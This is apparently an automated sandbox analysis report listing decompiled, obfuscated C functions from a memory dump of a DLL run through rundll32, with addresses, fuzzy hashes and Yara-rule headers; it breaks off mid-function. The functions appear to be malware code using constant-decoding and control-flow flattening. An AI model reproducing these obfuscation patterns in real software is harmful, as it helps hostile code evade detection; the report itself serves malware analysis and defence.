0x1001b3d9
0x1001b3df
0x1001b3e2
0x1001b3e4
0x00000000

Strings

Qu, xrefs: 1001B334

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Qu
API String ID: 0-3256286041
Opcode ID: 72d9035821b1f87b61d0bef66f101ffc1bb0575628e8c655921ffdd0e755d463
Instruction ID: 993f58a08032508fbc2eaa32d8b7856b11afd01b2926fc56810c97954de9ad7b
Opcode Fuzzy Hash: 72d9035821b1f87b61d0bef66f101ffc1bb0575628e8c655921ffdd0e755d463
Instruction Fuzzy Hash: 63519B72508301DFD348DF25D88690BBBF1FB88758F104A1DF499AA2A0D375DA56CF86

Uniqueness

Uniqueness Score: -1.00%

Function 10018668, Relevance: 1.4, Strings: 1, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E10018668(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* _t124;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t174;
				signed int _t175;
				void* _t179;

				_t179 = __eflags;
				_t174 = _a8;
				_push(_t174);
				_push(_a4);
				_push(__ecx);
				E100056B2(_t124);
				_v48 = _v48 & 0x00000000;
				_v60 = 0x2b6426;
				_v56 = 0x6e5114;
				_v52 = 0x76edce;
				_v28 = 0x79ec;
				_t153 = 0x78;
				_v28 = _v28 / _t153;
				_v28 = _v28 ^ 0x0000650d;
				_a8 = 0xe566;
				_a8 = _a8 + 0x6996;
				_t154 = 0x28;
				_a8 = _a8 * 0x2c;
				_a8 = _a8 << 6;
				_a8 = _a8 ^ 0x0e64e211;
				_v16 = 0x462c;
				_v16 = _v16 * 0x2a;
				_v16 = _v16 * 0x1a;
				_v16 = _v16 ^ 0x012b18fd;
				_v8 = 0x3be2;
				_v8 = _v8 ^ 0xc0b2cfc2;
				_v8 = _v8 + 0xffff8202;
				_v8 = _v8 + 0xffff281a;
				_v8 = _v8 ^ 0xc0b1e356;
				_v32 = 0xe529;
				_v32 = _v32 | 0xad89a33e;
				_v32 = _v32 ^ 0xad89e9bc;
				_v12 = 0xc860;
				_v12 = _v12 / _t154;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x00050c31;
				_v24 = 0x828e;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 ^ 0x00005687;
				_v20 = 0xf702;
				_v20 = _v20 << 5;
				_t155 = 0x19;
				_v20 = _v20 / _t155;
				_v20 = _v20 ^ 0x000138d2;
				_v40 = 0x21c7;
				_t156 = 0x48;
				_v40 = _v40 / _t156;
				_v40 = _v40 ^ 0x00003778;
				_v36 = 0x7572;
				_t157 = 0x45;
				_v36 = _v36 / _t157;
				_v36 = _v36 ^ 0x00006456;
				_v44 = E10017B6B();
				_a8 = 0x4920;
				_t158 = 0x7e;
				_a8 = _a8 / _t158;
				_a8 = _a8 ^ 0x00000090;
				_v28 = 0x69c4;
				_v28 = _v28 >> 2;
				_v28 = _v28 ^ 0x00001a61;
				_t175 = E1000607F(_t158, _t179, _t158, _v28, _a8);
				E1000D940(_t174, _v20, _v40, _v36, 1,  &_v44, _t175);
				 *((short*)(_t174 + _t175 * 2)) = 0;
				return 0;
			}

0x10018668
0x10018670
0x10018673
0x10018674
0x10018678
0x10018679
0x1001867e
0x10018684
0x1001868b
0x10018692
0x10018699
0x100186a5
0x100186aa
0x100186af
0x100186b6
0x100186bd
0x100186c8
0x100186cb
0x100186ce
0x100186d2
0x100186d9
0x100186e4
0x100186eb
0x100186ee
0x100186f5
0x100186fc
0x10018703
0x1001870a
0x10018711
0x10018718
0x1001871f
0x10018726
0x1001872d
0x1001873b
0x1001873e
0x10018742
0x10018749
0x10018750
0x10018754
0x10018758
0x1001875f
0x10018766
0x1001876d
0x10018772
0x10018777
0x1001877e
0x10018788
0x1001878d
0x10018792
0x10018799
0x100187a3
0x100187a6
0x100187a9
0x100187bb
0x100187c0
0x100187cc
0x100187d2
0x100187d5
0x100187dc
0x100187e3
0x100187e7
0x10018806
0x1001881d
0x10018827
0x10018830

Strings

&d+, xrefs: 10018684

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &d+
API String ID: 0-1856812195
Opcode ID: 930e4a88b72f900f157fc4a04b76e2da3c06cc500f2b69401a2902ce23c90efd
Instruction ID: b02ba9efede8e0657d026f88a3113f5aed79929258dc51e3690d2409ff298ab4
Opcode Fuzzy Hash: 930e4a88b72f900f157fc4a04b76e2da3c06cc500f2b69401a2902ce23c90efd
Instruction Fuzzy Hash: C6511671D00209ABEF08CFA5D94A9EEBBB6FF44314F10C059E514AB290D7B99A54CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1000D44C, Relevance: 1.4, Strings: 1, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E1000D44C(void* __ecx, void* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _t130;
				void* _t135;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				void* _t158;

				_t135 = __ecx;
				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(_a8);
				_push(0x104);
				_push(__edx);
				_push(__ecx);
				E100056B2(0x104);
				_v8 = 0xbcd1;
				_t158 = 0;
				_t152 = 0x36;
				_v8 = _v8 * 0x2e;
				_v8 = _v8 / _t152;
				_v8 = _v8 ^ 0x7bcd9522;
				_v8 = _v8 ^ 0x7bcd7ef1;
				_v20 = 0xd074;
				_t153 = 0x7c;
				_v20 = _v20 / _t153;
				_t154 = 7;
				_v20 = _v20 / _t154;
				_v20 = _v20 ^ 0x00001e29;
				_v32 = 0xd525;
				_v32 = _v32 << 0xf;
				_t155 = 0x6c;
				_v32 = _v32 / _t155;
				_v32 = _v32 ^ 0x00fcbc52;
				_v28 = 0x5229;
				_v28 = _v28 | 0x68e90e22;
				_v28 = _v28 << 8;
				_v28 = _v28 ^ 0xe95e5e4c;
				_v24 = 0xbbdc;
				_v24 = _v24 + 0xffff5b85;
				_t156 = 0x2b;
				_v24 = _v24 * 0x5a;
				_v24 = _v24 ^ 0x000800d6;
				_v12 = 0x4595;
				_v12 = _v12 | 0x5bffd677;
				_v12 = _v12 + 0xffff91eb;
				_v12 = _v12 ^ 0x5bff1f9a;
				_v48 = 0x86a3;
				_v48 = _v48 | 0x766d4cfb;
				_v48 = _v48 ^ 0x766ddf16;
				_v36 = 0x4caf;
				_v36 = _v36 | 0x279090db;
				_v36 = _v36 + 0xdfe5;
				_v36 = _v36 ^ 0x2791e7d1;
				_v44 = 0x2a6e;
				_v44 = _v44 + 0xffff210b;
				_v44 = _v44 ^ 0xffff72fc;
				_v16 = 0x7a4e;
				_v16 = _v16 / _t156;
				_v16 = _v16 << 7;
				_v16 = _v16 * 0x64;
				_v16 = _v16 ^ 0x008e4fe7;
				_v40 = 0x3228;
				_v40 = _v40 >> 0xd;
				_v40 = _v40 ^ 0x00001001;
				_t130 = E10003B31(__ecx, __ecx, __ecx, _v40);
				_t157 = _t130;
				if(_t130 != 0) {
					_push(_t135);
					_t158 = E1000C62B(_a8, _v32, _v28, _t157, _v24,  &_v52, _v12);
					E100078F0(_t157, _v48, _v36, _v44, _v16);
				}
				return _t158;
			}

0x1000d44c
0x1000d454
0x1000d45c
0x1000d45f
0x1000d462
0x1000d465
0x1000d466
0x1000d467
0x1000d468
0x1000d46d
0x1000d47d
0x1000d481
0x1000d482
0x1000d48c
0x1000d491
0x1000d498
0x1000d49f
0x1000d4a9
0x1000d4ae
0x1000d4b6
0x1000d4bb
0x1000d4c0
0x1000d4c7
0x1000d4ce
0x1000d4d5
0x1000d4da
0x1000d4df
0x1000d4e6
0x1000d4ed
0x1000d4f4
0x1000d4f8
0x1000d4ff
0x1000d506
0x1000d511
0x1000d512
0x1000d515
0x1000d51c
0x1000d523
0x1000d52a
0x1000d531
0x1000d538
0x1000d53f
0x1000d546
0x1000d54d
0x1000d554
0x1000d55b
0x1000d562
0x1000d569
0x1000d570
0x1000d577
0x1000d57e
0x1000d58a
0x1000d58d
0x1000d595
0x1000d598
0x1000d59f
0x1000d5a8
0x1000d5ac
0x1000d5be
0x1000d5c3
0x1000d5ca
0x1000d5cc
0x1000d5eb
0x1000d5f6
0x1000d5fb
0x1000d605

Strings

L^^, xrefs: 1000D4F8

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: L^^
API String ID: 0-295340116
Opcode ID: fa22bd86a460830a331d50a2ba865589b89019c83ade8a281ebc60d719fb16f5
Instruction ID: 5b9d8352787a9756c3e64560f2c9cebd3d80172517012275b39b5e8c23ac1851
Opcode Fuzzy Hash: fa22bd86a460830a331d50a2ba865589b89019c83ade8a281ebc60d719fb16f5
Instruction Fuzzy Hash: FF514775D00209EBEF04CFA9D94A8EEFBB5FB84314F208159E511B6260D3795A45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF11, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

K\n, xrefs: 1000CF4D

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: K\n
API String ID: 0-1066067252
Opcode ID: b06382163075361a3c44be5cb64449bbb243bed76c2da9e603d8431d6cc6b667
Instruction ID: 5fd8320ada1694ee6555ad69e33bb7130fac323d7898873b8d76c28e81ceb8ae
Opcode Fuzzy Hash: b06382163075361a3c44be5cb64449bbb243bed76c2da9e603d8431d6cc6b667
Instruction Fuzzy Hash: 78310576D0020CFBDF05CFE5C8898DEBBB1FB48304F108199EA18A6250D3B59A65DF80

Uniqueness

Uniqueness Score: -1.00%

Function 1000A83A, Relevance: .2, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1000A83A(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v148;
				void* _t186;
				void* _t214;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				void* _t229;
				intOrPtr* _t231;
				intOrPtr* _t250;
				signed int* _t251;
				void* _t252;
				void* _t253;

				_push(_a12);
				_t250 = _a8;
				_t251 = __ecx;
				_push(_t250);
				_push(_a4);
				_push(__ecx);
				E100056B2(_t186);
				_v84 = _v84 & 0x00000000;
				_t253 = _t252 + 0x14;
				_v96 = 0x42e790;
				_v92 = 0x166b03;
				_t229 = 0x403bd71;
				_v88 = 0x3f33f0;
				_v8 = 0xe45a;
				_v8 = _v8 + 0x5419;
				_v8 = _v8 + 0xffff7773;
				_v8 = _v8 + 0xffff99fb;
				_v8 = _v8 ^ 0x000024f5;
				_v64 = 0xf2de;
				_v64 = _v64 >> 5;
				_v64 = _v64 ^ 0x00005589;
				_v56 = 0x66c2;
				_v56 = _v56 + 0xffff7624;
				_v56 = _v56 ^ 0xfffffb7f;
				_v80 = 0x220;
				_t222 = 0x62;
				_v80 = _v80 * 0x53;
				_v80 = _v80 ^ 0x0000e004;
				_v12 = 0x437a;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0x349b;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00026b25;
				_v76 = 0x38de;
				_v76 = _v76 ^ 0x7523cf62;
				_v76 = _v76 ^ 0x75239d7e;
				_v68 = 0x7c01;
				_v68 = _v68 >> 6;
				_v68 = _v68 ^ 0x00006094;
				_v20 = 0xa4cb;
				_v20 = _v20 / _t222;
				_t223 = 0x21;
				_v20 = _v20 * 0xf;
				_v20 = _v20 / _t223;
				_v20 = _v20 ^ 0x00005a84;
				_v52 = 0x5274;
				_t224 = 0x27;
				_v52 = _v52 * 0x22;
				_v52 = _v52 ^ 0x000a8141;
				_v36 = 0x5a3a;
				_v36 = _v36 ^ 0x52f32f2b;
				_v36 = _v36 ^ 0xad8d6857;
				_v36 = _v36 ^ 0xff7e4623;
				_v60 = 0x640e;
				_v60 = _v60 * 0x1b;
				_v60 = _v60 ^ 0x000ab987;
				_v48 = 0xd288;
				_v48 = _v48 + 0x2c37;
				_v48 = _v48 / _t224;
				_v48 = _v48 ^ 0x00004291;
				_v28 = 0x54fc;
				_t225 = 0x60;
				_v28 = _v28 * 0x66;
				_v28 = _v28 << 0xd;
				_v28 = _v28 ^ 0x3b8d04ed;
				_v40 = 0x2878;
				_v40 = _v40 / _t225;
				_v40 = _v40 << 0xa;
				_v40 = _v40 ^ 0x0001c54a;
				_v32 = 0x68e5;
				_v32 = _v32 + 0xffffcd4c;
				_v32 = _v32 | 0x885dfaf7;
				_v32 = _v32 ^ 0x885dba23;
				_v44 = 0x878a;
				_v44 = _v44 | 0xeb76a9e1;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x0075e19b;
				_v72 = 0x39a;
				_t226 = 0x64;
				_v72 = _v72 / _t226;
				_v72 = _v72 ^ 0x00000009;
				_v16 = 0xa456;
				_v16 = _v16 + 0x7679;
				_v16 = _v16 | 0x2099d5c3;
				_v16 = _v16 * 0x46;
				_v16 = _v16 ^ 0xea13369a;
				_v24 = 0xa266;
				_v24 = _v24 >> 6;
				_v24 = _v24 | 0x0bc7efd3;
				_v24 = _v24 ^ 0x2d3320f9;
				_v24 = _v24 ^ 0x26f4c722;
				while(_t229 != 0x403bd71) {
					if(_t229 == 0xd2426f1) {
						E10018582(_v28, _t250 + 4, __eflags, _v40,  &_v148, _v32, _v44);
					} else {
						if(_t229 == 0x30c0e3fb) {
							_t231 = _t250;
							_t251[1] = E1001DD78(_t231);
							_push(_t231);
							_t214 = E1000607F(_t231, __eflags, _t231, _v24, _v16);
							_t253 = _t253 + 0x10;
							_t229 = 0x39b72fa5;
							_t251[1] = _t251[1] + _t214;
							continue;
						} else {
							if(_t229 == 0x36f770cf) {
								E1001F3E9(_v68, _v20, _v52, _t251,  &_v148);
								_t253 = _t253 + 0xc;
								_t229 = 0x388f3786;
								continue;
							} else {
								if(_t229 == 0x388f3786) {
									E1000CD04(_v36,  *_t250, _v60,  &_v148, _v48);
									_t253 = _t253 + 0xc;
									_t229 = 0xd2426f1;
									continue;
								} else {
									if(_t229 != 0x39b72fa5) {
										L13:
										__eflags = _t229 - 0x7f1da96;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_push(_t229);
										_t221 = E100157E8(_t251[1]);
										 *_t251 = _t221;
										if(_t221 != 0) {
											_t229 = 0x36f770cf;
											continue;
										}
									}
								}
							}
						}
					}
					__eflags =  *_t251;
					_t185 =  *_t251 != 0;
					__eflags = _t185;
					return 0 | _t185;
				}
				_t229 = 0x30c0e3fb;
				 *_t251 =  *_t251 & 0x00000000;
				__eflags =  *_t251;
				_t251[1] = _v72;
				goto L13;
			}

0x1000a846
0x1000a849
0x1000a84c
0x1000a84e
0x1000a84f
0x1000a853
0x1000a854
0x1000a859
0x1000a85d
0x1000a860
0x1000a869
0x1000a870
0x1000a875
0x1000a87c
0x1000a883
0x1000a88a
0x1000a891
0x1000a898
0x1000a89f
0x1000a8a6
0x1000a8aa
0x1000a8b1
0x1000a8b8
0x1000a8bf
0x1000a8c6
0x1000a8d3
0x1000a8d6
0x1000a8d9
0x1000a8e0
0x1000a8e7
0x1000a8eb
0x1000a8f2
0x1000a8f6
0x1000a8fd
0x1000a904
0x1000a90b
0x1000a912
0x1000a919
0x1000a91d
0x1000a924
0x1000a932
0x1000a939
0x1000a93c
0x1000a946
0x1000a949
0x1000a950
0x1000a95b
0x1000a95c
0x1000a95f
0x1000a966
0x1000a96d
0x1000a974
0x1000a97b
0x1000a982
0x1000a98d
0x1000a990
0x1000a997
0x1000a99e
0x1000a9aa
0x1000a9ad
0x1000a9b4
0x1000a9c3
0x1000a9c6
0x1000a9c9
0x1000a9cd
0x1000a9d4
0x1000a9e2
0x1000a9e5
0x1000a9e9
0x1000a9f0
0x1000a9f7
0x1000a9fe
0x1000aa05
0x1000aa0c
0x1000aa13
0x1000aa1a
0x1000aa1e
0x1000aa25
0x1000aa2f
0x1000aa37
0x1000aa3a
0x1000aa3e
0x1000aa45
0x1000aa4c
0x1000aa57
0x1000aa5a
0x1000aa61
0x1000aa68
0x1000aa6c
0x1000aa73
0x1000aa7a
0x1000aa81
0x1000aa93
0x1000ab80
0x1000aa99
0x1000aa9f
0x1000ab1b
0x1000ab22
0x1000ab31
0x1000ab39
0x1000ab3e
0x1000ab41
0x1000ab46
0x00000000
0x1000aaa1
0x1000aaa3
0x1000ab09
0x1000ab0e
0x1000ab11
0x00000000
0x1000aaa5
0x1000aaab
0x1000aae9
0x1000aaee
0x1000aaf1
0x00000000
0x1000aaad
0x1000aab3
0x1000ab5c
0x1000ab5c
0x1000ab62
0x00000000
0x00000000
0x1000ab68
0x1000aab9
0x1000aabf
0x1000aac3
0x1000aac8
0x1000aacd
0x1000aad3
0x00000000
0x1000aad3
0x1000aacd
0x1000aab3
0x1000aaab
0x1000aaa3
0x1000aa9f
0x1000ab8a
0x1000ab8e
0x1000ab8e
0x1000ab95
0x1000ab95
0x1000ab51
0x1000ab56
0x1000ab56
0x1000ab59
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 490a59cf89d529a46df9be0ebdbdf52a9a2cfee8a79e3243f32e0f1b5be57fa4
Instruction ID: 3e953d3043e1b2612aa2013cd6f624c31347c1387879b6d22a10554e2811d0ce
Opcode Fuzzy Hash: 490a59cf89d529a46df9be0ebdbdf52a9a2cfee8a79e3243f32e0f1b5be57fa4
Instruction Fuzzy Hash: FAA135B5D00209DBEF18CFA5D98A5EEFBB2FF04348F208119E511BA290D7B95A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1001D2CB, Relevance: .1, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1001D2CB(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t102;
				intOrPtr _t117;
				signed int _t120;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				void* _t130;
				intOrPtr _t132;
				intOrPtr _t145;

				_push(_a8);
				_push(_a4);
				_push(0x10021000);
				_push(__ecx);
				E100056B2(_t102);
				_v8 = 0x5955;
				_t126 = 0x64;
				_v8 = _v8 / _t126;
				_v8 = _v8 >> 5;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x0003dad4;
				_v32 = 0x6516;
				_v32 = _v32 + 0xffff2696;
				_v32 = _v32 ^ 0xffff8a6f;
				_v12 = 0xe36b;
				_t127 = 0x33;
				_v12 = _v12 / _t127;
				_v12 = _v12 | 0x8ae53edf;
				_t128 = 0x55;
				_v12 = _v12 * 0x17;
				_v12 = _v12 ^ 0x7a98878f;
				_v24 = 0xe515;
				_v24 = _v24 * 0x63;
				_t129 = 0x24;
				_v24 = _v24 / _t128;
				_v24 = _v24 ^ 0x00017ed2;
				_v20 = 0x2395;
				_v20 = _v20 | 0xb3f3aeab;
				_v20 = _v20 + 0xaf88;
				_v20 = _v20 ^ 0xb3f45cc9;
				_v28 = 0x9af0;
				_v28 = _v28 * 0x39;
				_v28 = _v28 ^ 0xd7063ba5;
				_v28 = _v28 ^ 0xd7241e55;
				_v44 = 0x4d1f;
				_v44 = _v44 >> 2;
				_v44 = _v44 ^ 0x00005248;
				_v40 = 0x8238;
				_t130 = 0x44;
				_v40 = _v40 / _t129;
				_v40 = _v40 ^ 0x00002f18;
				_v36 = 0x2afb;
				_v36 = _v36 ^ 0xf2c87ef6;
				_v36 = _v36 ^ 0xf2c81ca8;
				_v16 = 0xbb48;
				_v16 = _v16 | 0x7786f7dc;
				_v16 = _v16 ^ 0x7786ffdc;
				_t117 = E100157E8(_t130);
				 *0x100221c0 = _t117;
				if(_t117 == 0) {
					L7:
					return 0;
				}
				 *((intOrPtr*)(_t117 + 4)) = 0x10021000;
				 *((intOrPtr*)(_t117 + 0x18)) = 0x10021000;
				_t132 =  *0x100221c0;
				_t145 =  *((intOrPtr*)(_t132 + 4));
				 *(_t132 + 0x40) = _v16;
				_t120 =  *(_t132 + 0x28);
				while( *((intOrPtr*)(_t145 + _t120 * 8)) != 0) {
					_t120 = _t120 + 1;
					 *(_t132 + 0x28) = _t120;
				}
				if(E1001E19F(_v24, _v20, _a8) == 0) {
					E100091CD(_v28, _v44, _v40,  *0x100221c0, _v36);
					goto L7;
				}
				return 1;
			}

0x1001d2d2
0x1001d2da
0x1001d2dd
0x1001d2de
0x1001d2df
0x1001d2e4
0x1001d2f2
0x1001d2f7
0x1001d2fc
0x1001d300
0x1001d304
0x1001d30b
0x1001d312
0x1001d319
0x1001d320
0x1001d32a
0x1001d32f
0x1001d334
0x1001d33f
0x1001d342
0x1001d345
0x1001d34c
0x1001d357
0x1001d35f
0x1001d360
0x1001d365
0x1001d36f
0x1001d376
0x1001d37d
0x1001d384
0x1001d38b
0x1001d398
0x1001d39b
0x1001d3a2
0x1001d3a9
0x1001d3b0
0x1001d3b4
0x1001d3bb
0x1001d3c7
0x1001d3c8
0x1001d3cb
0x1001d3d2
0x1001d3d9
0x1001d3e0
0x1001d3e7
0x1001d3ee
0x1001d3f5
0x1001d402
0x1001d407
0x1001d40f
0x1001d46b
0x00000000
0x1001d46b
0x1001d411
0x1001d414
0x1001d41a
0x1001d420
0x1001d423
0x1001d426
0x1001d42f
0x1001d42b
0x1001d42c
0x1001d42c
0x1001d44a
0x1001d463
0x00000000
0x1001d468
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 555d0e0e36ac76e63080e4b91e516dd9c6c4ce408a46649481adf2781e1e811b
Instruction ID: 32c1e0764edadb428603f859bd3287ae8af053e8bec179c7a9d038295433632f
Opcode Fuzzy Hash: 555d0e0e36ac76e63080e4b91e516dd9c6c4ce408a46649481adf2781e1e811b
Instruction Fuzzy Hash: 56513675D00209EFDB08DFA4D98A5DEBBF1FB09314F20805AD505BB290D7B59A91CF94

Uniqueness

Uniqueness Score: -1.00%

Function 100173C0, Relevance: .1, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E100173C0(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				void* _t149;
				signed int _t150;
				void* _t153;

				_t153 = __eflags;
				_v24 = 0x158c;
				_v24 = _v24 | 0xc19b8b86;
				_v24 = _v24 + 0xffffcdb5;
				_v24 = _v24 ^ 0xc19b1e12;
				_v8 = 0x1996;
				_v8 = _v8 + 0xffffce0e;
				_t149 = __ecx;
				_v8 = _v8 * 0x33;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0xffeca024;
				_v40 = 0x2715;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x0000a273;
				_v12 = 0x2149;
				_v12 = _v12 << 1;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x1e3791f4;
				_v12 = _v12 ^ 0x1e37d0cb;
				_v28 = 0xe2f1;
				_v28 = _v28 << 3;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x001c0c8b;
				_v36 = 0x4110;
				_v36 = _v36 + 0xffff4283;
				_v36 = _v36 ^ 0xffffc6f6;
				_v20 = 0x5435;
				_v20 = _v20 >> 4;
				_v20 = _v20 << 7;
				_t138 = 0xe;
				_v20 = _v20 / _t138;
				_v20 = _v20 ^ 0x00005afa;
				_v16 = 0x4238;
				_v16 = _v16 + 0xe21;
				_v16 = _v16 ^ 0xb01b9cfe;
				_v16 = _v16 ^ 0x6bc8f8c5;
				_v16 = _v16 ^ 0xdbd331c2;
				_v32 = 0x5416;
				_t139 = 0x7b;
				_v32 = _v32 * 0x2f;
				_v32 = _v32 >> 0x10;
				_v32 = _v32 ^ 0x000053bd;
				_v44 = 0x8a9a;
				_v44 = _v44 / _t139;
				_v44 = _v44 ^ 0x00006f27;
				_v48 = E10017B6B();
				_v8 = 0x4004;
				_v8 = _v8 + 0xffff74e9;
				_v8 = _v8 | 0xacc11b51;
				_t140 = 0x54;
				_push(_t140);
				_v8 = _v8 / _t140;
				_v8 = _v8 ^ 0x030c2ffb;
				_v24 = 0x843c;
				_v24 = _v24 | 0xd1d25750;
				_v24 = _v24 * 0x7a;
				_v24 = _v24 ^ 0xfe7ab108;
				_t150 = E1000607F(_t140, _t153, _t140, _v24, _v8);
				E1000D940(_t149, _v16, _v32, _v44, 3,  &_v48, _t150);
				 *((short*)(_t149 + _t150 * 2)) = 0;
				return 0;
			}

0x100173c0
0x100173c6
0x100173cf
0x100173d6
0x100173dd
0x100173e4
0x100173eb
0x100173fa
0x100173fc
0x100173ff
0x10017403
0x1001740a
0x10017411
0x10017415
0x1001741c
0x10017423
0x10017426
0x1001742a
0x10017431
0x10017438
0x1001743f
0x10017443
0x10017447
0x1001744e
0x10017455
0x1001745c
0x10017463
0x1001746a
0x1001746e
0x10017475
0x1001747a
0x1001747f
0x10017486
0x1001748d
0x10017494
0x1001749b
0x100174a2
0x100174a9
0x100174b4
0x100174b5
0x100174b8
0x100174bc
0x100174c3
0x100174cf
0x100174d2
0x100174e4
0x100174e9
0x100174f0
0x100174f7
0x10017503
0x10017506
0x10017507
0x1001750a
0x10017511
0x10017518
0x10017523
0x10017526
0x10017545
0x1001755c
0x10017566
0x1001756f

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86156a53a794c3a1ea69ef44ad5d1bbdd6e349abb558353b653a94269d0cae3
Instruction ID: aa47c26f155a7e2cbc498b37881a1f4ddfca2c0909b3e0a1f8a2a5a537750eba
Opcode Fuzzy Hash: d86156a53a794c3a1ea69ef44ad5d1bbdd6e349abb558353b653a94269d0cae3
Instruction Fuzzy Hash: B351D2B1D0120AEBDF48CFA5DA8A8DEBBB1FB48314F208159D112B72A0D3B55B45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001BF25, Relevance: .1, Instructions: 99
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1001BF25(void* __ecx, void* __edx, void* __eflags) {
